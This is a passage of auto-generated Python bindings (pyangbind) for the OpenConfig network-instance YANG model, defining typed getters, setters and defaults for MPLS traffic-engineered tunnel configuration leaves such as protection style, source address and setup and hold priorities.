"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """protection_style_requested must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:UNPROTECTED"), is_leaf=True, yang_name="protection-style-requested", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__protection_style_requested = t
if hasattr(self, "_set"):
self._set()
def _unset_protection_style_requested(self):
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_reoptimize_timer(self):
"""
Getter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
YANG Description: Frequency of reoptimization of
a traffic engineered LSP.
"""
return self.__reoptimize_timer
def _set_reoptimize_timer(self, v, load=False):
"""
Setter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_reoptimize_timer is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reoptimize_timer() directly.
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """reoptimize_timer must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__reoptimize_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_reoptimize_timer(self):
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_source(self):
"""
Getter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
YANG Description: RSVP-TE tunnel source address
"""
return self.__source
def _set_source(self, v, load=False):
"""
Setter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_source is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_source() directly.
YANG Description: RSVP-TE tunnel source address
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """source must be of a type compatible with inet:ip-address""",
"defined-type": "inet:ip-address",
"generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}),RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}),], is_leaf=True, yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address', is_config=True)""",
}
)
self.__source = t
if hasattr(self, "_set"):
self._set()
def _unset_source(self):
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
def _get_soft_preemption(self):
"""
Getter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
YANG Description: Enables RSVP soft-preemption on this LSP
"""
return self.__soft_preemption
def _set_soft_preemption(self, v, load=False):
"""
Setter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_soft_preemption is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_soft_preemption() directly.
YANG Description: Enables RSVP soft-preemption on this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """soft_preemption must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__soft_preemption = t
if hasattr(self, "_set"):
self._set()
def _unset_soft_preemption(self):
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_setup_priority(self):
"""
Getter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
return self.__setup_priority
def _set_setup_priority(self, v, load=False):
"""
Setter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_setup_priority is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_setup_priority() directly.
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(7),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """setup_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(7), is_leaf=True, yang_name="setup-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__setup_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_setup_priority(self):
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(7),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_hold_priority(self):
"""
Getter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
return self.__hold_priority
def _set_hold_priority(self, v, load=False):
"""
Setter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_hold_priority is considered a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hold_priority() directly.
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(0),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """hold_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(0), is_leaf=True, yang_name="hold-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__hold_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_hold_priority(self):
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(0),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
name = __builtin__.property(_get_name, _set_name)
type = __builtin__.property(_get_type, _set_type)
signaling_protocol = __builtin__.property(
_get_signaling_protocol, _set_signaling_protocol
)
description = __builtin__.property(_get_description, _set_description)
admin_status = __builtin__.property(_get_admin_status, _set_admin_status)
preference = __builtin__.property(_get_preference, _set_preference)
metric_type = __builtin__.property(_get_metric_type, _set_metric_type)
metric = __builtin__.property(_get_metric, _set_metric)
shortcut_eligible = __builtin__.property(
_get_shortcut_eligible, _set_shortcut_eligible
)
protection_style_requested = __builtin__.property(
_get_protection_style_requested, _set_protection_style_requested
)
reoptimize_timer = __builtin__.property(
_get_reoptimize_timer, _set_reoptimize_timer
)
source = __builtin__.property(_get_source, _set_source)
soft_preemption = __builtin__.property(_get_soft_preemption, _set_soft_preemption)
setup_priority = __builtin__.property(_get_setup_priority, _set_setup_priority)
hold_priority = __builtin__.property(_get_hold_priority, _set_hold_priority)
_pyangbind_elements = OrderedDict(
[
("name", name),
("type", type),
("signaling_protocol", signaling_protocol),
("description", description),
("admin_status", admin_status),
("preference", preference),
("metric_type", metric_type),
("metric", metric),
("shortcut_eligible", shortcut_eligible),
("protection_style_requested", protection_style_requested),
("reoptimize_timer", reoptimize_timer),
("source", source),
("soft_preemption", soft_preemption),
("setup_priority", setup_priority),
("hold_priority", hold_priority),
]
)
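# Sketch (assumed usage): _pyangbind_elements preserves YANG leaf order,
# so a serializer can walk the container deterministically, e.g.:
#
#   for leaf, prop in cfg._pyangbind_elements.items():
#       value = getattr(cfg, leaf)
#
# where `cfg` is an instance of the generated config class and `prop`
# is the __builtin__.property object bound above.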
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/mpls/lsps/constrained-path/tunnels/tunnel/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters related to TE tunnels:
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__name",
"__type",
"__signaling_protocol",
"__description",
"__admin_status",
"__preference",
"__metric_type",
"__metric",
"__shortcut_eligible",
"__protection_style_requested",
"__reoptimize_timer",
"__source",
"__soft_preemption",
"__setup_priority",
"__hold_priority",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__name = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
self.__type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2P": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:P2MP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__signaling_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
